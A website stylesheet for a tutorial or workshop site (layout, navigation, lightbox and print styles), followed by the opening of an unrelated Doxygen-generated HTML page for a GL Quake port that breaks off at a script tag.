white-space: nowrap;
border-bottom: 0 solid transparent
}
}
.top-navigation li a {
display: block;
padding: 10px 0;
border-bottom: 0 solid transparent;
-webkit-transition: all .2s;
-moz-transition: all .2s;
-ms-transition: all .2s;
-o-transition: all .2s;
transition: all .2s;
decoration: none
}
@media only screen and (min-width:37.5em) {
.top-navigation li a {
display: inline;
padding: 0
}
}
.navicon-lines-button {
padding:.375rem .75rem;
cursor: pointer;
border-radius:.21428571428571427rem;
transition: .3s;
user-select: none
}
.navicon-lines-button:hover {
opacity: 1
}
.navicon-lines-button:active {
transition: 0
}
.navicon-lines {
position: relative;
display: inline-block;
width: 1.5rem;
height:.21428571428571427rem;
margin-right: 10px;
margin-bottom:.3rem;
background: #fff;
border-radius:.10714285714285714rem;
transition: .3s
}
.navicon-lines:before, .navicon-lines:after {
position: absolute;
left: 0;
display: inline-block;
width: 1.5rem;
height:.21428571428571427rem;
background: #fff;
border-radius:.10714285714285714rem;
content: '';
transition: .3s;
-webkit-transform-origin:.10714285714285714rem center;
transform-origin:.10714285714285714rem center
}
.navicon-lines:before {
top:.375rem
}
.navicon-lines:after {
top: -0.375rem
}
.navicon-lines-button:hover {
opacity: 1
}
.navicon-lines-button:hover .navicon-lines:before {
top:.42857142857142855rem
}
.navicon-lines-button:hover .navicon-lines:after {
top: -0.42857142857142855rem
}
.navicon-lines-button.x.active .navicon-lines {
background: transparent
}
.navicon-lines-button.x.active .navicon-lines:before, .navicon-lines-button.x.active .navicon-lines:after {
top: 0;
width: 1.5rem;
-webkit-transform-origin: 50% 50%;
transform-origin: 50% 50%
}
.navicon-lines-button.x.active .navicon-lines:before {
-webkit-transform: rotate3d(0, 0, 1, 45deg);
transform: rotate3d(0, 0, 1, 45deg)
}
.navicon-lines-button.x.active .navicon-lines:after {
-webkit-transform: rotate3d(0, 0, 1, -45deg);
transform: rotate3d(0, 0, 1, -45deg)
}
.nav .navtoogle {
font-size: 18px;
font-size: 1.125rem;
font-weight: normal;
color: #fff;
cursor: pointer;
background-color: #111;
border: 0
}
@media only screen and (min-width:37.5em) {
.nav .navtoogle {
display: none
}
}
.nav button {
background: 0;
border: 0
}
.navtoogle i {
z-index: -1
}
.icon-menu {
position: relative;
top: 3px;
line-height: 0
}
.no-js .nav .navtoggle {
display: none
}
.no-js .nav ul {
max-height: 30em;
overflow: hidden
}
.js .nav ul {
max-height: 0;
overflow: hidden
}
@media only screen and (min-width:37.5em) {
.js .nav ul {
max-height: 30em
}
}
.js .nav .active+ul {
max-height: 30em;
overflow: hidden;
-webkit-transition: max-height .4s;
-moz-transition: max-height .4s;
-ms-transition: max-height .4s;
-o-transition: max-height .4s;
transition: max-height .4s
}
#main {
width: 100%;
margin: 0 auto;
margin-top: 1em;
clear: both;
*zoom:1;
counter-reset: captions
}
#main:before, #main:after {
display: table;
content: ""
}
#main:after {
clear: both
}
#main:before, #main:after {
display: table;
line-height: 0;
content: ""
}
#main:after {
clear: both
}
#main article {
display: inline;
float: left;
width: 100%;
width: 83.33333333333334%;
margin: 0 auto;
margin-right: 8.333333333333334%;
margin-bottom: 2em;
margin-left: 8.333333333333334%
}
@media only screen and (min-width:37.5em) {
#main article {
display: inline;
float: left;
width: 50%;
margin-right: 0;
margin-left: 0
}
}
@media only screen and (min-width:37.5em) {
#mainWorkshop article {
display: inline;
float: left;
width: 40%;
margin-right: 0;
margin-left: 0
}
}
@media only screen and (min-width:86.375em) {
#main article {
display: inline;
float: left;
width: 37.5%
}
}
#index {
display: inline;
float: left;
width: 100%;
width: 83.33333333333334%;
margin: 0 auto;
margin-right: 8.333333333333334%;
margin-bottom: 2em;
margin-left: 8.333333333333334%
}
@media only screen and (min-width:37.5em) {
#index {
display: inline;
float: left;
width: 50%;
margin-right: 0;
margin-left: 0
}
}
@media only screen and (min-width:86.375em) {
#index {
display: inline;
float: left;
width: 37.5%
}
}
#index h3 {
padding-bottom: .5em;
margin: 0;
font-size: 28px;
font-size: 1.75rem;
border-bottom: 1px solid #c3c3c3
}
#index article h2 {
margin-bottom: 4px;
font-size: 20px;
font-size: 1.25rem
}
#index article h2.link-post {
margin-bottom: 26px;
margin-bottom: 1.625rem
}
#index article p {
font-size: 14px;
font-size:.875rem
}
#index article p+p {
text-indent: 0
}
.image-wrap {
position: relative;
margin-bottom: 2em;
margin-left: 16%;
margin-right: 16%;
}
.image-wrap:after {
position: absolute;
bottom: -1px;
left: 8%;
display: block;
width: 0;
height: 0;
/* border: 20px solid transparent;
border-bottom-color: #fff;
content: " " */
}
@media only screen and (min-width:37.5em) {
.image-wrap:after {
left: 25%
}
}
@media only screen and (min-width:86.375em) {
.image-wrap:after {
left: 33.333333333%
}
}
.image-wrap img {
width: 100%;
height: auto;
-ms-interpolation-mode: bicubic
}
.image-wrap .headline-wrap {
position: absolute;
bottom: 25px;
margin-left: 8.333333333333334%
}
@media only screen and (min-width:37.5em) {
.image-wrap .headline-wrap {
left: 25%;
margin-left: 0
}
}
@media only screen and (min-width:86.375em) {
.image-wrap .headline-wrap {
margin-left: 8.333333333333334%
}
}
.image-wrap .headline-wrap h1, .image-wrap .headline-wrap h2 {
color: #fff;
text-shadow: 0 1px 2px rgba(0,0,0,0.25)
}
.byline {
clear: both;
font-size: 80%
}
.article-author-side h3, .article-author-bottom h3 {
margin-bottom: 0
}
.article-author-side p, .article-author-bottom p {
font-size: 80%;
font-style: italic
}
.article-author-side a, .article-author-bottom a, .article-author-side a:hover, .article-author-bottom a:hover {
border-bottom: 0 solid transparent
}
.author-social {
display: block;
margin-bottom: 5px;
font-size: 14px;
font-size:.875rem;
color: #111
}
.author-social:visited {
color: #111
}
.author-social:hover {
-webkit-transform: scale(1.1);
-moz-transform: scale(1.1);
-ms-transform: scale(1.1);
-o-transform: scale(1.1);
transform: scale(1.1)
}
.author-social:active {
-webkit-transform: translate(0, 2px);
-moz-transform: translate(0, 2px);
-ms-transform: translate(0, 2px);
-o-transform: translate(0, 2px);
transform: translate(0, 2px)
}
.author-social .fa {
margin-right: 5px
}
.article-author-side {
display: none
}
.article-author-side .bio-photo {
max-width: 110px;
-webkit-border-radius: 0px;
-moz-border-radius: 0px;
border-radius: 0px
}
@media only screen and (min-width:37.5em) {
.article-author-side {
display: block;
display: inline;
float: left;
width: 16.666666666666668%;
margin-right: 4.166666666666667%;
margin-left: 4.166666666666667%
}
.article-author-side h3, .article-author-side p, .article-author-side .author-social {
display: block;
max-width: 125px
}
.article-author-side h3 {
margin-top: 10px;
margin-bottom: 10px
}
.article-author-side p {
margin-bottom: 20px
}
.article-author-side .author-social {
margin-bottom: 5px
}
}
@media only screen and (min-width:62em) {
.article-author-side h3, .article-author-side .bio-photo, .article-author-side p, .article-author-side .author-social {
max-width: 100px
}
}
@media only screen and (min-width:86.375em) {
.article-author-side {
display: inline;
float: left;
width: 12.5%;
margin-left: 16.666666666666668%
}
}
.article-author-bottom {
margin-bottom: 1em
}
@media only screen and (min-width:37.5em) {
.article-author-bottom {
display: none
}
}
.article-author-bottom .bio-photo {
float: left;
max-width: 100px;
margin-right: 25px;
-webkit-border-radius: 10px;
-moz-border-radius: 10px;
border-radius: 10px
}
.article-author-bottom .author-social {
display: inline-block;
margin-right: 10px
}
@media only screen and (min-width:62em) {
.article-author-bottom h3, .article-author-bottom .bio-photo, .article-author-bottom p, .article-author-bottom .author-social {
max-width: 150px
}
}
.article-wrap p>a, .article-wrap li>a {
border-bottom: 1px dotted #b3b3b3
}
.article-wrap p>a:hover, .article-wrap li>a:hover {
border-bottom-style: solid
}
.article-wrap p>a.reversefootnote, .article-wrap li>a.reversefootnote {
border-bottom-width: 0
}
.toc {
display: none;
font-size: 95%
}
@media only screen and (min-width:37.5em) {
.toc {
position: absolute;
top: 38.5em;
right: 0;
display: block;
display: inline;
float: left;
width: 16.666666666666668%;
margin-right: 4.166666666666667%;
margin-left: 6.166666666666667%;
background-color: #fff
}
}
.toc header {
background: #2b2b2b
}
.toc h3 {
padding: 5px 10px;
margin: 0;
font-size: 16px;
font-size: 1rem;
color: #fff;
text-transform: uppercase
}
.toc h3:hover {
cursor: pointer
}
.toc ul {
padding: 0;
margin: 2px 0 0;
line-height: 1
}
.toc li {
display: block;
padding: 0;
margin: 0 0 1px 0;
font-family: 'PT Sans Narrow', sans-serif;
list-style-type: none
}
.toc li:last-child {
border-bottom-width: 0
}
.toc li a {
display: block;
padding: 10px;
color: #fff;
background: #5e5e5e;
border-bottom-width: 0;
-webkit-opacity: .7;
-moz-opacity: .7;
opacity: .7;
-webkit-transition: opacity .2s ease-in-out;
-moz-transition: opacity .2s ease-in-out;
-ms-transition: opacity .2s ease-in-out;
-o-transition: opacity .2s ease-in-out;
transition: opacity .2s ease-in-out
}
.toc li a:hover {
-webkit-opacity: 1;
-moz-opacity: 1;
opacity: 1
}
.toc li ul {
margin: 1px 0 0
}
.image-grid {
padding: 0;
margin: 0 0 1em;
list-style: none;
*zoom:1
}
.image-grid:before, .image-grid:after {
display: table;
content: ""
}
.image-grid:after {
clear: both
}
.image-grid:before, .image-grid:after {
display: table;
line-height: 0;
content: ""
}
.image-grid:after {
clear: both
}
.image-grid li {
display: inline;
float: left;
width: 50%
}
@media only screen and (min-width:30em) {
.image-grid li {
width: 33.333333%
}
}
@media only screen and (min-width:37.5em) {
.image-grid li {
width: 25%
}
}
@media only screen and (min-width:48em) {
.image-grid li {
width: 20%
}
}
@media only screen and (min-width:62em) {
.image-grid li {
width: 16.666666666%
}
}
.recent-grid {
margin: 1em 0;
list-style: none;
*zoom:1
}
.recent-grid:before, .recent-grid:after {
display: table;
content: ""
}
.recent-grid:after {
clear: both
}
.recent-grid:before, .recent-grid:after {
display: table;
line-height: 0;
content: ""
}
.recent-grid:after {
clear: both
}
.recent-grid li {
display: inline
}
.recent-grid li a {
border-bottom: 0 solid transparent
}
.recent-grid li a:hover {
border-bottom: 0 solid transparent
}
.recent-grid img {
width: 19%;
margin-bottom: 1%
}
.holder {
font-family: 'PT Sans Narrow', sans-serif
}
.holder a {
margin: 0 5px;
cursor: pointer
}
.holder a.jp-previous {
margin-right: 15px;
margin-left: 0
}
.holder a.jp-next {
margin-right: 0;
margin-left: 15px
}
.holder a.jp-current {
font-weight: bold
}
.holder a.jp-current, .holder a.jp-current:hover, .holder a.jp-disabled, .holder a.jp-disabled:hover {
cursor: default;
background: 0
}
.holder span {
margin: 0 5px
}
.footer-wrap {
width: 100%;
padding-bottom: 3em;
margin: 0 auto;
clear: both;
*zoom:1
}
.footer-wrap:before, .footer-wrap:after {
display: table;
content: ""
}
.footer-wrap:after {
clear: both
}
.footer-wrap:before, .footer-wrap:after {
display: table;
line-height: 0;
content: ""
}
.footer-wrap:after {
clear: both
}
.footer-wrap a, .footer-wrap a:active, .footer-wrap a:visited, .footer-wrap p, .footer-wrap h4, .footer-wrap h5, .footer-wrap h6, .footer-wrap span {
font-size: 14px;
font-size:.875rem
}
.footer-wrap footer {
display: inline;
float: left;
width: 83.33333333333334%;
margin-right: 8.333333333333334%;
margin-left: 8.333333333333334%
}
@media only screen and (min-width:37.5em) {
.footer-wrap footer {
display: inline;
float: left;
width: 50%;
margin-right: 25%;
margin-left: 25%
}
}
@media only screen and (min-width:86.375em) {
.footer-wrap footer {
display: inline;
float: left;
width: 37.5%;
margin-right: 29.166666666666668%;
margin-left: 33.333333333333336%
}
}
.related-articles {
display: inline;
float: left;
width: 83.33333333333334%;
margin-right: 8.333333333333334%;
margin-bottom: 2em;
margin-left: 8.333333333333334%
}
@media only screen and (min-width:37.5em) {
.related-articles {
display: inline;
float: left;
width: 50%;
margin-right: 25%;
margin-left: 25%
}
}
@media only screen and (min-width:86.375em) {
.related-articles {
display: inline;
float: left;
width: 37.5%;
margin-right: 29.166666666666668%;
margin-left: 33.333333333333336%
}
}
.related-articles h4 {
margin-bottom: 0;
text-transform: uppercase
}
.related-articles li {
margin-bottom: 0
}
.footer-icons li {
display: inline-block;
padding-right: 5px
}
.footer-icons li a {
color: #9a9a9a;
-webkit-transition: .4s linear;
-moz-transition: .4s linear;
-ms-transition: .4s linear;
-o-transition: .4s linear;
transition: .4s linear
}
.footer-icons li a:hover {
text-decoration: none;
border-bottom: 0
}
.footer-icons li a:hover .icon-twitter, .footer-icons li a:hover .icon-twitter-sign {
color: #2aa9df
}
.footer-icons li a:hover .icon-facebook, .footer-icons li a:hover .icon-facebook-sign {
color: #3a5a98
}
.footer-icons li a:hover .icon-instagram, .footer-icons li a:hover .icon-instagram-sign {
color: #306088
}
.footer-icons li a:hover .icon-google-plus, .footer-icons li a:hover .icon-google-plus-sign {
color: #b63324
}
.footer-icons li a:hover .icon-lastfm, .footer-icons li a:hover .icon-lastfm-sign {
color: #d80049
}
.footer-icons li a:hover .icon-github {
color: #4183c4
}
.browser-upgrade {
padding: 10px;
margin: 0 0 2em 0;
color: #fff;
text-align: center;
background: #000
}
.browser-upgrade a {
color: #fff;
text-decoration: none;
border-bottom: 1px dotted #fff
}
.browser-upgrade a:hover {
border-bottom: 1px solid #fff
}
#goog-fixurl ul {
padding-left: 0;
margin-left: 0;
list-style: none
}
#goog-fixurl ul li {
list-style-type: none
}
#goog-wm-qt {
display: inline-block;
width: auto;
padding: 8px 20px;
margin-right: 10px;
margin-bottom: 20px;
font-size: 14px;
font-size:.875rem;
color: #111;
background-color: #fff;
border-color: #919191;
border-style: solid!important;
border-width: 2px!important;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px
}
#goog-wm-sb {
display: inline-block;
padding: 8px 20px;
margin-bottom: 20px;
font-size: 14px;
font-size:.875rem;
color: #fff;
background-color: #111;
border-color: #111;
border-style: solid!important;
border-width: 2px!important;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px
}
#goog-wm-sb:visited {
color: #fff
}
#goog-wm-sb:hover {
color: #111;
background-color: #fff
}
.mfp-bg {
position: fixed;
top: 0;
left: 0;
z-index: 502;
width: 100%;
height: 100%;
overflow: hidden;
background: #0b0b0b;
opacity: .8;
filter: alpha(opacity=80)
}
.mfp-wrap {
position: fixed;
top: 0;
left: 0;
z-index: 503;
width: 100%;
height: 100%;
outline: none!important;
-webkit-backface-visibility: hidden
}
.mfp-container {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
padding: 0 8px;
text-align: center;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box
}
.mfp-container:before {
display: inline-block;
height: 100%;
vertical-align: middle;
content: ''
}
.mfp-align-top .mfp-container:before {
display: none
}
.mfp-content {
position: relative;
z-index: 505;
display: inline-block;
margin: 0 auto;
text-align: left;
vertical-align: middle
}
.mfp-inline-holder .mfp-content, .mfp-ajax-holder .mfp-content {
width: 100%;
cursor: auto
}
.mfp-inline-holder .mfp-content:after, .mfp-ajax-holder .mfp-content:after {
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
z-index: -1;
display: block;
width: auto;
height: auto;
content: '';
box-shadow: 0 0 8px rgba(0,0,0,0.6)
}
.mfp-ajax-cur {
cursor: progress
}
.mfp-zoom-out-cur, .mfp-zoom-out-cur .mfp-image-holder .mfp-close {
cursor: -moz-zoom-out;
cursor: -webkit-zoom-out;
cursor: zoom-out
}
.mfp-zoom, .image-popup {
cursor: pointer;
cursor: -webkit-zoom-in;
cursor: -moz-zoom-in;
cursor: zoom-in
}
.mfp-auto-cursor .mfp-content {
cursor: auto
}
.mfp-close, .mfp-arrow, .mfp-preloader, .mfp-counter {
-webkit-user-select: none;
-moz-user-select: none;
user-select: none
}
.mfp-loading.mfp-figure {
display: none
}
.mfp-hide {
display: none!important
}
.mfp-preloader {
position: absolute;
top: 50%;
right: 8px;
left: 8px;
z-index: 504;
width: auto;
margin-top: -0.8em;
color: #ccc;
text-align: center
}
.mfp-preloader a {
color: #ccc
}
.mfp-preloader a:hover {
color: white
}
.mfp-s-ready .mfp-preloader {
display: none
}
.mfp-s-error .mfp-content {
display: none
}
button.mfp-close, button.mfp-arrow {
z-index: 506;
display: block;
padding: 0;
overflow: visible;
cursor: pointer;
border: 0;
-webkit-appearance: none
}
button.mfp-close {
background: transparent
}
button::-moz-focus-inner {
padding:0;
border:0
}
.mfp-close {
position: absolute;
top: 0;
right: 0;
width: 44px;
height: 44px;
padding: 0 0 18px 10px;
font-family: Arial, Baskerville, monospace;
font-size: 28px;
font-style: normal;
line-height: 44px;
color: white;
text-align: center;
text-decoration: none;
opacity: .65
}
.mfp-close:hover, .mfp-close:focus {
opacity: 1
}
.mfp-close:active {
top: 1px
}
.mfp-close-btn-in .mfp-close {
color: #333
}
.mfp-image-holder .mfp-close, .mfp-iframe-holder .mfp-close {
right: -6px;
width: 100%;
padding-right: 6px;
color: white;
text-align: right
}
.mfp-counter {
position: absolute;
top: 0;
right: 0;
font-size: 12px;
line-height: 18px;
color: #ccc
}
.mfp-arrow {
position: absolute;
top: 0;
top: 50%;
width: 90px;
height: 110px;
padding: 0;
margin: 0;
margin-top: -55px;
overflow: hidden;
text-indent: 100%;
white-space: nowrap;
background-color: #111;
opacity: .65;
-webkit-transition: opacity .2s ease-in-out;
-moz-transition: opacity .2s ease-in-out;
-ms-transition: opacity .2s ease-in-out;
-o-transition: opacity .2s ease-in-out;
transition: opacity .2s ease-in-out;
-webkit-tap-highlight-color: rgba(0,0,0,0)
}
.mfp-arrow:active {
margin-top: -54px
}
.mfp-arrow:hover, .mfp-arrow:focus {
opacity: 1
}
.mfp-arrow:before, .mfp-arrow:after, .mfp-arrow .mfp-b, .mfp-arrow .mfp-a {
position: absolute;
top: 0;
left: 0;
display: block;
width: 0;
height: 0;
margin-top: 35px;
margin-left: 35px;
border: solid transparent;
content: ''
}
.mfp-arrow:after, .mfp-arrow .mfp-a {
top: 8px;
border-top-width: 12px;
border-bottom-width: 12px;
opacity: .8
}
.mfp-arrow:before, .mfp-arrow .mfp-b {
border-top-width: 20px;
border-bottom-width: 20px
}
.mfp-arrow-left {
left: 0;
-webkit-border-top-right-radius: 5px;
border-top-right-radius: 5px;
-webkit-border-bottom-right-radius: 5px;
border-bottom-right-radius: 5px;
-webkit-border-bottom-left-radius: 0;
border-bottom-left-radius: 0;
-webkit-border-top-left-radius: 0;
border-top-left-radius: 0;
-moz-border-radius-topright: 5px;
-moz-border-radius-bottomright: 5px;
-moz-border-radius-bottomleft: 0;
-moz-border-radius-topleft: 0;
-webkit-background-clip: padding-box;
-moz-background-clip: padding;
background-clip: padding-box
}
.mfp-arrow-left:after, .mfp-arrow-left .mfp-a {
left: 5px;
border-right: 12px solid #fff
}
.mfp-arrow-left:before, .mfp-arrow-left .mfp-b {
border-right: 20px solid #fff
}
.mfp-arrow-right {
right: 0;
-webkit-border-top-right-radius: 0;
border-top-right-radius: 0;
-webkit-border-bottom-right-radius: 0;
border-bottom-right-radius: 0;
-webkit-border-bottom-left-radius: 5px;
border-bottom-left-radius: 5px;
-webkit-border-top-left-radius: 5px;
border-top-left-radius: 5px;
-moz-border-radius-topright: 0;
-moz-border-radius-bottomright: 0;
-moz-border-radius-bottomleft: 5px;
-moz-border-radius-topleft: 5px;
-webkit-background-clip: padding-box;
-moz-background-clip: padding;
background-clip: padding-box
}
.mfp-arrow-right:after, .mfp-arrow-right .mfp-a {
left: 3px;
border-left: 12px solid #fff
}
.mfp-arrow-right:before, .mfp-arrow-right .mfp-b {
border-left: 20px solid #fff
}
.mfp-iframe-holder {
padding-top: 40px;
padding-bottom: 40px
}
.mfp-iframe-holder .mfp-content {
width: 100%;
max-width: 900px;
line-height: 0
}
.mfp-iframe-scaler {
width: 100%;
height: 0;
padding-top: 56.25%;
overflow: hidden
}
.mfp-iframe-scaler iframe {
position: absolute;
top: 0;
left: 0;
display: block;
width: 100%;
height: 100%;
background: black;
box-shadow: 0 0 8px rgba(0,0,0,0.6)
}
.mfp-iframe-holder .mfp-close {
top: -40px
}
img.mfp-img {
display: block;
width: auto;
height: auto;
max-width: 100%;
padding: 40px 0 40px;
margin: 0 auto;
line-height: 0;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box
}
.mfp-figure:after {
position: absolute;
top: 40px;
right: 0;
bottom: 40px;
left: 0;
z-index: -1;
display: block;
width: auto;
height: auto;
content: '';
box-shadow: 0 0 8px rgba(0,0,0,0.6)
}
.mfp-figure {
line-height: 0
}
.mfp-bottom-bar {
position: absolute;
top: 100%;
left: 0;
width: 100%;
margin-top: -36px;
cursor: auto
}
.mfp-title {
line-height: 18px;
color: #f3f3f3;
text-align: left
}
.mfp-figure small {
display: block;
font-size: 12px;
line-height: 14px;
color: #bdbdbd
}
.mfp-image-holder .mfp-content {
max-width: 100%
}
.mfp-gallery .mfp-image-holder .mfp-figure {
cursor: pointer
}
@media screen and (max-width:800px) and (orientation:landscape), screen and (max-height:300px) { {
}
.mfp-img-mobile .mfp-image-holder {
padding-right: 0;
padding-left: 0
}
.mfp-img-mobile img.mfp-img {
padding: 0
}
.mfp-img-mobile .mfp-figure:after {
top: 0;
bottom: 0
}
.mfp-img-mobile .mfp-bottom-bar {
position: fixed;
top: auto;
bottom: 0;
padding: 3px 5px;
margin: 0;
background: rgba(0,0,0,0.6);
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box
}
.mfp-img-mobile .mfp-bottom-bar:empty {
padding: 0
}
.mfp-img-mobile .mfp-counter {
top: 3px;
right: 5px
}
.mfp-img-mobile .mfp-close {
position: fixed;
top: 0;
right: 0;
width: 35px;
height: 35px;
padding: 0;
line-height: 35px;
text-align: center;
background: rgba(0,0,0,0.6)
}
.mfp-img-mobile .mfp-figure small {
display: inline;
margin-left: 5px
}
}
@media all and (max-width:800px) {
.mfp-arrow {
-webkit-transform: scale(0.75);
transform: scale(0.75)
}
.mfp-arrow-left {
-webkit-transform-origin: 0 0;
transform-origin: 0 0
}
.mfp-arrow-right {
-webkit-transform-origin: 100%;
transform-origin: 100%
}
.mfp-container {
padding-right: 6px;
padding-left: 6px
}
}
.mfp-ie7 .mfp-img {
padding: 0
}
.mfp-ie7 .mfp-bottom-bar {
left: 50%;
width: 600px;
padding-bottom: 5px;
margin-top: 5px;
margin-left: -300px
}
.mfp-ie7 .mfp-container {
padding: 0
}
.mfp-ie7 .mfp-content {
padding-top: 44px
}
.mfp-ie7 .mfp-close {
top: 0;
right: 0;
padding-top: 0
}
.mfp-fade .zoom-anim-dialog {
opacity: 0;
-webkit-transform: scale(0.8);
-moz-transform: scale(0.8);
-ms-transform: scale(0.8);
-o-transform: scale(0.8);
transform: scale(0.8);
-webkit-transition: all .2s ease-in-out;
-moz-transition: all .2s ease-in-out;
-ms-transition: all .2s ease-in-out;
-o-transition: all .2s ease-in-out;
transition: all .2s ease-in-out
}
.mfp-fade.mfp-ready .zoom-anim-dialog {
opacity: 1;
-webkit-transform: scale(1);
-moz-transform: scale(1);
-ms-transform: scale(1);
-o-transform: scale(1);
transform: scale(1)
}
.mfp-fade.mfp-removing .zoom-anim-dialog {
opacity: 0;
-webkit-transform: scale(0.8);
-moz-transform: scale(0.8);
-ms-transform: scale(0.8);
-o-transform: scale(0.8);
transform: scale(0.8)
}
.mfp-fade.mfp-bg {
opacity: 0;
-webkit-transition: opacity .3s ease-out;
-moz-transition: opacity .3s ease-out;
-ms-transition: opacity .3s ease-out;
-o-transition: opacity .3s ease-out;
transition: opacity .3s ease-out
}
.mfp-fade.mfp-ready.mfp-bg {
opacity: .8
}
.mfp-fade.mfp-removing.mfp-bg {
opacity: 0
}
@media print {
* {
position: static!important;
color: black!important;
text-shadow: none!important;
background: transparent!important;
-ms-filter: none!important;
filter: none!important;
box-shadow: none!important
}
@page {
margin:.5cm
}
h2, h3 {
orphans: 3;
widows: 3;
page-break-after: avoid
}
p {
orphans: 3;
widows: 3
}
pre, blockquote {
padding: 1em;
border: 1px solid #333;
page-break-inside: avoid
}
abbr[title]:after {
content: " (" attr(title) ")"
}
a, a:visited {
text-decoration: underline
}
a[href]:after {
content: " (" attr(href) ")"
}
a[href^="javascript:"]:after, a[href^="#"]:after {
content: ""
}
img {
max-width: 100%!important;
page-break-inside: avoid
}
thead {
display: table-header-group
}
tr {
page-break-inside: avoid
}
}
/* leah's modifications - make the side bar smaller */
.article-author-side > h2 {
font-size: 1.2rem;
margin: 2rem 0 .5rem 0;
color: #343434
}
.article-author-side > h3 {
font-size: 1.2rem;
color:#636363;
}
.article-author-side p, .article-author-bottom p {
color:#828282;
}
.post-link {
font-size: 0.8rem;
}
.posts {
margin: 0 0 0 1rem;
padding: 0px
}
#relatedCode h2 {
}
#relatedCode {
/*background-color:#cfcfcf; */
padding: 0.01rem 2rem .2rem 2rem;
margin: 0 0 1em 0;
border-radius: 1em;
-webkit-border-radius: 1em;
-moz-border-radius: 1em;
}
#relatedCode a {
}
div#cat_tag_content, div#objectives {
background-color:#E3E8E8;
padding:1.3em;
font-size:.9em;
box-shadow: .2em .2em .1em #ccc;
border-radius: 1em;
}
div.article-author-side h5 {
margin:0rem .3rem 0rem .2rem;
color: #707070;
line-height:1.2rem;
font-size:.9rem;
}
div.article-author-side h5 a{
color: #707070;
}
.related-articles h2 a {
font-size: 1.5rem;
color:#525252
}
.post-date {
font-size: 0.85em;
font-style: italic;
}
/* GREY BOX CODE */
#objectives > h1 {
font-size: 1.75rem;
margin: 1rem 0 .925rem;
}
p .btn.btn-success {
margin: 0;
}
/* ################### table Formating ################# */
tbody tr:nth-child(odd) {
background-color: #f9f9f9;
border-bottom: 1px solid #dddddd;
border-top: 1px solid #dddddd;
}
th {
text-align: left;
font-family:"PT Sans Narrow",sans-serif;
font-size:1.2em;
}
td {
padding: 0.5em;
}
td a {
border-bottom: 1px solid #99CCFF;
}
/* ################### code Formating ################# */
.hljs {
padding:1.4em;
}
/* ################### ITILED LAYOUT ################# */
.tiles {margin-top:4em;}
.tile {
float:left;
width: 23% ;
margin-right:2.3%;
margin-left:0;
display:block;
}
#mainCheat {
background-color:#CCC;
}
#main #mainCheat article.tile {
float:left;
width: 23%;
margin-right:2.4%;
margin-left:0;
display:block;
}
#main #mainCheat article {
margin-left:15%;
margin-right:10%;
width:80%;
}
.tiles h2 {
font-size: 1.3em;
margin-top: 0.3em;
padding: 0;
margin-bottom: .2em;
}
.entry-date.date.published, .tiles .entry-date {
margin:0;
color:#928d90;
text-transform: uppercase;
font-size:.75em;
}
.post-excerpt {
font-size: 0.9em;
margin-top: 0.4em;
}
.tiles article img {
height:11em;
box-shadow: 6px 6px 4px #ccc;
border: 1px solid #ccc;
}
img.load {
width: 100%;
}
/* ############## SIDEBAR STUFF ######### */
.sidebar {
background-color: #F6F8F8;
bottom: 0;
color: rgba(255, 255, 255, 0.6);
font-family: "PT Sans",Helvetica,Arial,sans-serif;
font-size: 0.875rem;
left: -14rem;
overflow-y: auto;
top: 0;
transition: all 0.3s ease-in-out 0s;
width: 85%;
}
.sidebar-nav {
border-bottom: 1px solid #e3e8e8;
}
.sidebar-nav-item {
border-top: 1px solid #e3e8e8;
display: block;
padding: 0.4rem .5rem;
}
.sidebar-nav-item.active, a.sidebar-nav-item:hover, a.sidebar-nav-item:focus {
background-color: #e3e8e8;
border-color: transparent;
text-decoration: none;
}
/* ############## NEON Styles ########### */
.navigation-wrapper {
border-top:5px solid #1ea0c1
}
/* make top bar link teal */
.site-name > a {
color: #1ea0c1;
}
.NEON-header {
/*background-color:#1ea0c1;
background-image: url("{{ site.baseurl }}/images/banners/topBar_tree.png");
background-repeat: no-repeat;
height:0px; */
margin:0 0 .2em 0;
}
/* trying to clear for the next line */
.NEON-header:before, .NEON-header:after {
display: table;
line-height: 0;
content: ""
}
.NEON-header:after {
clear: both
}
/* adding example challenge styles */
div#challenge {
background-color: #ffffe5;
border: 1px solid #ccc;
padding: 1em;
border-radius: 1em;
box-shadow: 1px 5px 3px #ccc;
}
div#challenge h2 {
background-color: #ffffe5;
border-bottom: 1px solid #ccc;
margin-top: 0;
margin-bottom: 1em;
}
/* Workshop Sidebar Styles*/
.post-link > div {
border-top: 1px solid #00a5cc;
border-left: 1px solid #ccc;
margin: 0em;
padding: 0.5em;
box-shadow: 2px 2px 5px #ccc;
}
a:hover.post-link > div {
background-color:#ffffcc;
}
#workshopLink > h4 {
margin: 0;
}
#index > h1 {
color: #1ea0c1;
}
.workshop div#objectives, .tutorialSeries div#objectives {
background-color: #d4eff7;
} |
docs/html/structqpic__t.html | quakecodex/chocolate-glquake | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.12"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>Chocolate GL Quake: qpic_t Struct Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td id="projectalign" style="padding-left: 0.5em;">
<div id="projectname">Chocolate GL Quake
 <span id="projectnumber">0.1.0</span>
</div>
<div id="projectbrief">A bland GL Quake Port</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.12 -->
<script type="text/javascript">
